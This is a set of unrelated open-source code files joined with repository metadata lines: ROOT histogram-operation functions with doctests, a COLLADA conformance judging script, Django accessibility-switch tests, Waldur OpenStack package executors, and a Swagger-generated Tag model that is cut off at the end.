"stack needs lumis to match. (%f != %f)" % (lumi, wrp.lumi)
)
if sample != wrp.sample: # add to stack
sample = ""
stk_wrp.Add(wrp.histo)
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
if not sample:
del info["sample"]
return wrappers.StackWrapper(stk_wrp, **info)
@add_wrp_kws
@history.track_history
def sum(wrps):
"""
Applies only to HistoWrappers. Returns HistoWrapper. Adds lumi up.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1)
1
>>> h2.Fill(3)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = sum([w1, w2])
>>> w3.histo.Integral()
3.0
>>> w3.lumi
5.0
"""
wrps = iterableize(wrps)
histo = None
lumi = 0.
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"sum accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo)
else:
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi += wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def diff(wrps):
"""
Applies only to HistoWrappers. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1, 2)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 4.5)
>>> h2.Fill(1)
1
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = diff([w1, w2])
>>> w3.histo.Integral()
1.0
>>> w3.lumi
2.0
"""
wrps = iterableize(wrps)
histo = None
lumi = 0.
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"sum accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo, -1.)
else:
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi = wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def merge(wrps):
"""
Applies only to HistoWrapper. Returns HistoWrapper. Normalizes histos to lumi.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1,3)
1
>>> h2.Fill(2,6)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3.)
>>> w3 = merge([w1, w2])
>>> w3.histo.Integral()
5.0
>>> w3.lumi
1.0
"""
wrps = iterableize(wrps)
histo = None
info = None
for wrp in wrps:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"merge accepts only HistoWrappers. wrp: "
+ str(wrp)
)
if histo:
histo.Add(wrp.histo, 1. / wrp.lumi)
else:
histo = wrp.histo.Clone()
histo.Scale(1. / wrp.lumi)
info = wrp.all_info()
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = 1.
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def prod(wrps):
"""
Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2, history="w1")
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1)
1
>>> h2.Fill(2)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = prod([w1, w2])
>>> w3.histo.Integral()
1.0
>>> w3.lumi
1.0
>>> w4 = wrappers.FloatWrapper(2.)
>>> w5 = prod([w1, w4])
>>> w5.histo.Integral()
2.0
"""
wrps = iterableize(wrps)
histo = None
info = None
lumi = 1.
for wrp in wrps:
if histo:
if isinstance(wrp, wrappers.HistoWrapper):
histo.Multiply(wrp.histo)
lumi = 1.
elif not isinstance(wrp, wrappers.FloatWrapper):
raise WrongInputError(
"prod accepts only HistoWrappers and FloatWrappers. wrp: "
+ str(wrp)
)
else:
histo.Scale(wrp.float)
lumi *= wrp.float
else:
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"prod expects first argument to be of type HistoWrapper. wrp: "
+ str(wrp)
)
histo = wrp.histo.Clone()
info = wrp.all_info()
lumi = wrp.lumi
if not info:
raise TooFewWrpsError(
"At least one Wrapper must be provided."
)
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def div(wrps):
"""
Applies to HistoWrapper and FloatWrapper. Returns HistoWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1,4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Fill(1,2)
1
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = div([w1, w2])
>>> w3.histo.Integral()
2.0
>>> w4 = wrappers.FloatWrapper(2., history="w4")
>>> w5 = div([w1, w4])
>>> w5.histo.Integral()
2.0
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
nominator = next(wrps)
denominator = next(wrps)
except StopIteration:
raise TooFewWrpsError("div needs exactly two Wrappers.")
try:
wrps.next()
raise TooManyWrpsError("div needs exactly two Wrappers.")
except StopIteration:
pass
if not isinstance(nominator, wrappers.HistoWrapper):
raise WrongInputError(
"div needs nominator to be of type HistoWrapper. nominator: "
+ str(nominator)
)
if not (isinstance(denominator, wrappers.HistoWrapper) or
isinstance(denominator, wrappers.FloatWrapper)):
raise WrongInputError(
"div needs denominator to be of type HistoWrapper or FloatWrapper. denominator: "
+ str(denominator)
)
histo = nominator.histo.Clone()
lumi = nominator.lumi
if isinstance(denominator, wrappers.HistoWrapper):
histo.Divide(denominator.histo)
lumi = 1.
else:
histo.Scale(1. / denominator.float)
lumi /= denominator.float
info = nominator.all_info()
info["lumi"] = lumi
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def lumi(wrp):
"""
Applies to HistoWrapper. Returns FloatWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2 = lumi(w1)
>>> w2.float
2.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"lumi needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
info = wrp.all_info()
return wrappers.FloatWrapper(wrp.lumi, **info)
@add_wrp_kws
@history.track_history
def norm_to_lumi(wrp):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w1.histo.Integral()
4.0
>>> w2 = norm_to_lumi(w1)
>>> w2.histo.Integral()
2.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"norm_to_lumi needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
histo.Scale(1. / wrp.lumi)
info = wrp.all_info()
info["lumi"] = 1.
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def norm_to_integral(wrp, use_bin_width=False):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w1.histo.Integral()
4.0
>>> w2 = norm_to_integral(w1)
>>> w2.histo.Integral()
1.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"norm_to_integral needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
integr = wrp.histo.Integral(option) or 1.
histo.Scale(1. / integr)
info = wrp.all_info()
info["lumi"] /= integr
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def copy(wrp):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1, 4)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2=copy(w1)
>>> w2.histo.GetName()
'h1'
>>> w1.name == w2.name
True
>>> w1.histo.Integral() == w2.histo.Integral()
True
>>> w1.histo != w2.histo
True
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"copy needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
info = wrp.all_info()
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def rebin(wrp, bin_bounds, norm_by_bin_width=False):
"""
Applies to HistoWrapper. Returns Histowrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 4, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(2)
2
>>> w1 = wrappers.HistoWrapper(h1, lumi=2.)
>>> w2=rebin(w1, [.5, 2.5, 4.5])
>>> w1.histo.GetNbinsX()
4
>>> w2.histo.GetNbinsX()
2
>>> w2.histo.GetBinContent(1)
2.0
>>> w2.histo.GetBinContent(2)
0.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"rebin needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
if len(bin_bounds) < 2:
raise OperationError(
"Number of bins < 2, must include at least one bin!"
)
bin_bounds = array.array("d", bin_bounds)
orig_bin_width = wrp.histo.GetBinWidth(1)
histo = wrp.histo.Rebin(
len(bin_bounds) - 1,
wrp.name,
bin_bounds
)
if norm_by_bin_width:
for i in xrange(histo.GetNbinsX()+1):
factor = histo.GetBinWidth(i) / orig_bin_width
histo.SetBinContent(i, histo.GetBinContent(i) / factor)
histo.SetBinError(i, histo.GetBinError(i) / factor)
info = wrp.all_info()
return wrappers.HistoWrapper(histo, **info)
@add_wrp_kws
@history.track_history
def trim(wrp, left=True, right=True):
"""
Applies to HistoWrapper. Returns Histowrapper.
If left / right are set to values, these are applied. Otherwise empty bins
are cut off.
>>> from ROOT import TH1I
>>> w1 = wrappers.HistoWrapper(TH1I("h1", "", 10, .5, 10.5))
>>> w1.histo.Fill(5)
5
>>> w2 = trim(w1)
>>> w2.histo.GetNbinsX()
1
>>> w2.histo.GetXaxis().GetXmin()
4.5
>>> w2.histo.GetXaxis().GetXmax()
5.5
>>> w2 = trim(w1, 3.5, 7.5)
>>> w2.histo.GetNbinsX()
4
>>> w2.histo.GetXaxis().GetXmin()
3.5
>>> w2.histo.GetXaxis().GetXmax()
7.5
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"trim needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
# find left / right values if not given
histo = wrp.histo
axis = histo.GetXaxis()
n_bins = histo.GetNbinsX()
if type(left) == bool:
if left:
for i in xrange(n_bins+1):
if histo.GetBinContent(i):
left = axis.GetBinLowEdge(i)
break
else:
left = axis.GetXmin()
if type(right) == bool:
if right:
for i in xrange(n_bins+1, 0, -1):
if histo.GetBinContent(i):
right = axis.GetBinUpEdge(i)
break
else:
right = axis.GetXmax()
if left > right:
raise OperationError("bounds: left > right")
# create new bin_bounds
index = 0
while axis.GetBinLowEdge(index) < left:
index += 1
bin_bounds = [axis.GetBinLowEdge(index)]
while axis.GetBinUpEdge(index) <= right:
bin_bounds.append(axis.GetBinUpEdge(index))
index += 1
return rebin(wrp, bin_bounds)
@add_wrp_kws
@history.track_history
def mv_in(wrp, overflow=True, underflow=True):
"""
Moves under- and/or overflow bin into first/last bin.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(0)
-1
>>> h1.Fill(5,3)
-1
>>> w1 = wrappers.HistoWrapper(h1)
>>> w1.histo.Integral()
0.0
>>> w2 = mv_in(w1, False, False)
>>> w2.histo.Integral()
0.0
>>> w3 = mv_in(w1, True, False)
>>> w3.histo.Integral()
3.0
>>> w4 = mv_in(w1, False, True)
>>> w4.histo.Integral()
1.0
>>> w5 = mv_in(w1, True, True)
>>> w5.histo.Integral()
4.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"mv_bin needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
histo = wrp.histo.Clone()
nbins = histo.GetNbinsX()
if underflow:
firstbin = histo.GetBinContent(0)
firstbin += histo.GetBinContent(1)
histo.SetBinContent(1, firstbin)
histo.SetBinContent(0, 0.)
if overflow:
lastbin = histo.GetBinContent(nbins + 1)
lastbin += histo.GetBinContent(nbins)
histo.SetBinContent(nbins, lastbin)
histo.SetBinContent(histo.GetNbinsX() + 1, 0.)
return wrappers.HistoWrapper(histo, **wrp.all_info())
@add_wrp_kws
@history.track_history
def integral(wrp, use_bin_width=False):
"""
Integral. Applies to HistoWrapper. Returns FloatWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,3)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = integral(w1)
>>> w2.float
4.0
>>> w3 = integral(w1, True)
>>> w3.float
8.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
option = "width" if use_bin_width else ""
info = wrp.all_info()
return wrappers.FloatWrapper(wrp.histo.Integral(option), **info)
@add_wrp_kws
@history.track_history
def int_l(wrp, use_bin_width=False):
"""
Left-sided integral. Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,2)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = int_l(w1)
>>> w2.histo.GetBinContent(1)
1.0
>>> w2.histo.GetBinContent(2)
3.0
>>> w2 = int_l(w1, True)
>>> w2.histo.GetBinContent(1)
2.0
>>> w2.histo.GetBinContent(2)
6.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int_l needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
int_histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
for i in xrange(int_histo.GetNbinsX(), 0, -1):
error = ctypes.c_double()
value = int_histo.IntegralAndError(1, i, error, option)
int_histo.SetBinContent(i, value)
int_histo.SetBinError(i, error.value)
info = wrp.all_info()
return wrappers.HistoWrapper(int_histo, **info)
@add_wrp_kws
@history.track_history
def int_r(wrp, use_bin_width=False):
"""
Applies to HistoWrapper. Returns HistoWrapper.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 4.5)
>>> h1.Fill(1)
1
>>> h1.Fill(3,2)
2
>>> w1 = wrappers.HistoWrapper(h1)
>>> w2 = int_r(w1)
>>> w2.histo.GetBinContent(1)
3.0
>>> w2.histo.GetBinContent(2)
2.0
>>> w2 = int_r(w1, True)
>>> w2.histo.GetBinContent(1)
6.0
>>> w2.histo.GetBinContent(2)
4.0
"""
if not isinstance(wrp, wrappers.HistoWrapper):
raise WrongInputError(
"int_r needs argument of type HistoWrapper. histo: "
+ str(wrp)
)
int_histo = wrp.histo.Clone()
option = "width" if use_bin_width else ""
n_bins = int_histo.GetNbinsX()
for i in xrange(1, 1 + n_bins):
error = ctypes.c_double()
value = int_histo.IntegralAndError(i, n_bins, error, option)
int_histo.SetBinContent(i, value)
int_histo.SetBinError(i, error.value)
info = wrp.all_info()
return wrappers.HistoWrapper(int_histo, **info)
@add_wrp_kws
@history.track_history
def chi2(wrps, x_min=0, x_max=0):
"""
Expects two Histowrappers. Returns FloatWrapper.
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
first, second = next(wrps), next(wrps)
except StopIteration:
raise TooFewWrpsError("chi2 needs exactly two HistoWrappers.")
try:
wrps.next()
raise TooManyWrpsError("chi2 needs exactly two HistoWrappers.")
except StopIteration:
pass
for w in (first, second):
if not isinstance(w, wrappers.HistoWrapper):
raise WrongInputError(
"chi2 needs type HistoWrapper. w: "
+ str(w)
)
if not first.histo.GetNbinsX() == second.histo.GetNbinsX():
raise WrongInputError(
"chi2 needs histos with same number of bins."
)
if not x_max:
x_max = int(first.histo.GetNbinsX() - 1)
def get_weight_for_bin(i):
val = (first.histo.GetBinContent(i+1)
- second.histo.GetBinContent(i+1))**2
err1 = first.histo.GetBinError(i+1)
err2 = second.histo.GetBinError(i+1)
if err1 and err2:
return val / (err1**2 + err2**2)
else:
return 0.
chi2_val = __builtin__.sum(
get_weight_for_bin(i)
for i in xrange(x_min, x_max)
)
info = second.all_info()
info.update(first.all_info())
return wrappers.FloatWrapper(
chi2_val,
**info
)
@add_wrp_kws
@history.track_history
def eff(wrps, option=''):
"""
Applies to HistoWrappers only. Returns GraphWrapper. Takes lumi from first.
>>> from ROOT import TH1I
>>> h1 = TH1I("h1", "", 2, .5, 2.5)
>>> h1.Fill(1)
1
>>> h1.Fill(1)
1
>>> w1 = wrappers.HistoWrapper(h1, lumi=2)
>>> h2 = TH1I("h2", "", 2, .5, 2.5)
>>> h2.Sumw2()
>>> h2.Fill(1)
1
>>> h2.Fill(1)
1
>>> h2.Fill(1)
1
>>> h2.Fill(2)
2
>>> w2 = wrappers.HistoWrapper(h2, lumi=3)
>>> w3 = eff([w1, w2])
>>> w3.graph.GetN()
2
>>> hi = w3.graph.GetErrorYhigh(0)
>>> lo = w3.graph.GetErrorYlow(0)
>>> abs(hi - 0.277375360987) < 1e-10
True
>>> abs(lo - 0.414534706284) < 1e-10
True
"""
wrps = iterableize(wrps)
wrps = iter(wrps)
try:
nominator = next(wrps)
denominator = next(wrps)
except StopIteration:
raise TooFewWrpsError("eff needs exactly two Wrappers.")
try:
wrps.next()
raise TooManyWrpsError("eff needs exactly two Wrappers.")
except StopIteration:
pass
if not isinstance(nominator, wrappers.HistoWrapper):
raise WrongInputError(
"eff needs nominator to be of type HistoWrapper. nominator: "
+ str(nominator)
)
if not (isinstance(denominator, wrappers.HistoWrapper)):
raise WrongInputError(
"eff needs denominator to be of type HistoWrapper. denominator: "
+ str(denominator)
)
graph = TGraphAsymmErrors(nominator.histo, denominator.histo, option)
graph.GetXaxis().SetTitle(nominator.histo.GetXaxis().GetTitle())
info = nominator.all_info()
return wrappers.GraphWrapper(graph, **info)
if __name__ == "__main__":
import ROOT
ROOT.TH1.AddDirectory(False)
import doctest
doctest.testmod()
|
gpl-3.0
| 8,743,581,249,339,879,000
| 25.882488
| 93
| 0.552413
| false
| 3.053389
| false
| false
| false
|
KhronosGroup/COLLADA-CTS
|
StandardDataSets/1_5/collada/asset/coverage/geographic_location/absolute/absolute.py
|
1
|
4333
|
# Copyright (c) 2012 The Khronos Group Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and /or associated documentation files (the "Materials "), to deal in the Materials without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Materials, and to permit persons to whom the Materials are furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Materials.
# THE MATERIALS ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE MATERIALS OR THE USE OR OTHER DEALINGS IN THE MATERIALS.
# See Core.Logic.FJudgementContext for the information
# of the 'context' parameter.
# This sample judging object does the following:
#
# JudgeBaseline: just verifies that the standard steps did not crash.
# JudgeSuperior: also verifies that the validation steps are not in error.
# JudgeExemplary: same as intermediate badge.
# We import an assistant script that includes the common verifications
# methods. The assistant buffers its checks, so that running them again
# does not incurs an unnecessary performance hint.
from StandardDataSets.scripts import JudgeAssistant
# Please feed your node list here:
tagLst = [['asset', 'coverage', 'geographic_location', 'longitude'],
['asset', 'coverage', 'geographic_location', 'latitude'],
['asset', 'coverage', 'geographic_location', 'altitude']]
attrName = 'mode'
attrVal = ''
dataToCheck = ''
class SimpleJudgingObject:
def __init__(self, _tagLst, _attrName, _attrVal, _data):
self.tagList = _tagLst
self.attrName = _attrName
self.attrVal = _attrVal
self.dataToCheck = _data
self.status_baseline = False
self.status_superior = False
self.status_exemplary = False
self.__assistant = JudgeAssistant.JudgeAssistant()
def JudgeBaseline(self, context):
# No step should not crash
self.__assistant.CheckCrashes(context)
# Import/export/validate must exist and pass, while Render must only exist.
self.__assistant.CheckSteps(context, ["Import", "Export", "Validate"], ["Render"])
self.status_baseline = self.__assistant.GetResults()
return self.status_baseline
# To pass intermediate you need to pass basic, this object could also include additional
# tests that were specific to the intermediate badge.
def JudgeSuperior(self, context):
self.status_superior = self.status_baseline
return self.status_superior
# To pass advanced you need to pass intermediate, this object could also include additional
# tests that were specific to the advanced badge
def JudgeExemplary(self, context):
# if superior fails, no point in further checking
if (self.status_superior == False):
self.status_exemplary = self.status_superior
return self.status_exemplary
# Compare the rendered images
self.__assistant.CompareRenderedImages(context)
self.__assistant.ElementDataPreserved(context, self.tagList[0], "float")
self.__assistant.ElementDataPreserved(context, self.tagList[1], "float")
self.__assistant.ElementDataPreserved(context, self.tagList[2], "float")
self.__assistant.AttributePreserved(context, self.tagList[2], self.attrName)
self.status_exemplary = self.__assistant.DeferJudgement(context)
return self.status_exemplary
# This is where all the work occurs: "judgingObject" is an absolutely necessary token.
# The dynamic loader looks very specifically for a class instance named "judgingObject".
#
judgingObject = SimpleJudgingObject(tagLst, attrName, attrVal, dataToCheck);
|
mit
| 4,687,221,361,627,715,000
| 52.225
| 466
| 0.708054
| false
| 4.182432
| false
| false
| false
|
ministryofjustice/manchester_traffic_offences_pleas
|
apps/plea/tests/test_accessibility_switcher.py
|
1
|
2202
|
from django.test import TestCase
from django.test.client import Client
from django.conf import settings
from importlib import import_module
from waffle.models import Switch
class TestAccessibilitySwitcher(TestCase):
def setUp(self):
self.client = Client()
# http://code.djangoproject.com/ticket/10899
settings.SESSION_ENGINE = 'django.contrib.sessions.backends.file'
engine = import_module(settings.SESSION_ENGINE)
store = engine.SessionStore()
store.save()
self.session = store
self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key
def test_a11y_testing_waffle_switch_off(self):
response = self.client.get("/set-a11y-testing/")
self.assertEqual(response.status_code, 404)
def test_a11y_testing_mode_tota11y(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=tota11y")
response = self.client.get("/")
self.assertContains(response, "/static/javascripts/vendor/tota11y.min.js")
def test_a11y_testing_mode_google(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=google")
response = self.client.get("/")
self.assertContains(response, "/static/javascripts/vendor/axs_testing.js")
def test_a11y_testing_mode_off(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=off")
response = self.client.get("/")
self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js")
self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
def test_a11y_testing_mode_wrong(self):
Switch.objects.create(name="enable_a11y_testing", active=True)
response = self.client.get("/set-a11y-testing/?mode=gfhdjaks")
response = self.client.get("/")
self.assertNotContains(response, "/static/javascripts/vendor/tota11y.min.js")
self.assertNotContains(response, "/static/javascripts/vendor/axs_testing.js")
|
mit
| -3,648,315,149,922,748,000
| 36.965517
| 85
| 0.690736
| false
| 3.580488
| true
| false
| false
|
opennode/nodeconductor-assembly-waldur
|
src/waldur_mastermind/packages/executors.py
|
1
|
4271
|
from waldur_core.core import executors as core_executors
from waldur_core.core import tasks as core_tasks
from waldur_core.core import utils as core_utils
from waldur_core.structure import executors as structure_executors
from waldur_mastermind.packages.serializers import _get_template_quotas
from waldur_openstack.openstack import executors as openstack_executors
from . import tasks
class OpenStackPackageCreateExecutor(core_executors.BaseExecutor):
@classmethod
def get_task_signature(cls, package, serialized_package, **kwargs):
tenant = package.tenant
serialized_tenant = core_utils.serialize_instance(tenant)
service_settings = package.service_settings
serialized_service_settings = core_utils.serialize_instance(service_settings)
create_tenant = openstack_executors.TenantCreateExecutor.get_task_signature(
tenant, serialized_tenant, **kwargs
)
set_tenant_ok = openstack_executors.TenantCreateExecutor.get_success_signature(
tenant, serialized_tenant
)
populate_service_settings = tasks.OpenStackPackageSettingsPopulationTask().si(
serialized_package
)
create_service_settings = structure_executors.ServiceSettingsCreateExecutor.get_task_signature(
service_settings, serialized_service_settings
)
return (
create_tenant
| set_tenant_ok
| populate_service_settings
| create_service_settings
)
@classmethod
def get_success_signature(cls, package, serialized_package, **kwargs):
""" Get Celery signature of task that should be applied on successful execution. """
service_settings = package.service_settings
serialized_service_settings = core_utils.serialize_instance(service_settings)
return core_tasks.StateTransitionTask().si(
serialized_service_settings, state_transition='set_ok'
)
@classmethod
def get_failure_signature(cls, package, serialized_package, **kwargs):
return tasks.OpenStackPackageErrorTask().s(serialized_package)
class OpenStackPackageChangeExecutor(core_executors.BaseExecutor):
@classmethod
def get_success_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
service_settings = core_utils.serialize_instance(service_settings)
return tasks.LogOpenStackPackageChange().si(
serialized_tenant,
event='succeeded',
new_package=new_template.name,
old_package=old_package.template.name,
service_settings=service_settings,
)
@classmethod
def get_failure_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
service_settings = core_utils.serialize_instance(service_settings)
return tasks.LogOpenStackPackageChange().si(
serialized_tenant,
event='failed',
new_package=new_template.name,
old_package=old_package.template.name,
service_settings=service_settings,
)
@classmethod
def get_task_signature(
cls,
tenant,
serialized_tenant,
new_template,
old_package,
service_settings,
**kwargs
):
quotas = {
quota_field.name: value
for quota_field, value in _get_template_quotas(new_template).items()
}
push_quotas = openstack_executors.TenantPushQuotasExecutor.as_signature(
tenant, quotas=quotas
)
serialized_new_template = core_utils.serialize_instance(new_template)
serialized_old_package = core_utils.serialize_instance(old_package)
serialized_service_settings = core_utils.serialize_instance(service_settings)
success_package_change = tasks.OpenStackPackageSuccessTask().si(
serialized_tenant,
serialized_new_template,
serialized_old_package,
serialized_service_settings,
)
return push_quotas | success_package_change
|
mit
| -6,142,464,563,913,863,000
| 34.008197
| 103
| 0.656989
| false
| 4.53397
| false
| false
| false
|
iEngage/python-sdk
|
iengage_client/models/tag.py
|
1
|
3896
|
# coding: utf-8
"""
Stakeholder engagement API
This API enables Intelligent Engagement for your Business. iEngage is a platform that combines process, augmented intelligence and rewards to help you intelligently engage customers.
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class Tag(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, tag_id=None, tag_name=None, count=None):
"""
Tag - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'tag_id': 'int',
'tag_name': 'str',
'count': 'int'
}
self.attribute_map = {
'tag_id': 'tagId',
'tag_name': 'tagName',
'count': 'count'
}
self._tag_id = tag_id
self._tag_name = tag_name
self._count = count
@property
def tag_id(self):
"""
Gets the tag_id of this Tag.
:return: The tag_id of this Tag.
:rtype: int
"""
return self._tag_id
@tag_id.setter
def tag_id(self, tag_id):
"""
Sets the tag_id of this Tag.
:param tag_id: The tag_id of this Tag.
:type: int
"""
self._tag_id = tag_id
@property
def tag_name(self):
"""
Gets the tag_name of this Tag.
:return: The tag_name of this Tag.
:rtype: str
"""
return self._tag_name
@tag_name.setter
def tag_name(self, tag_name):
"""
Sets the tag_name of this Tag.
:param tag_name: The tag_name of this Tag.
:type: str
"""
self._tag_name = tag_name
@property
def count(self):
"""
Gets the count of this Tag.
:return: The count of this Tag.
:rtype: int
"""
return self._count
@count.setter
def count(self, count):
"""
Sets the count of this Tag.
:param count: The count of this Tag.
:type: int
"""
self._count = count
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
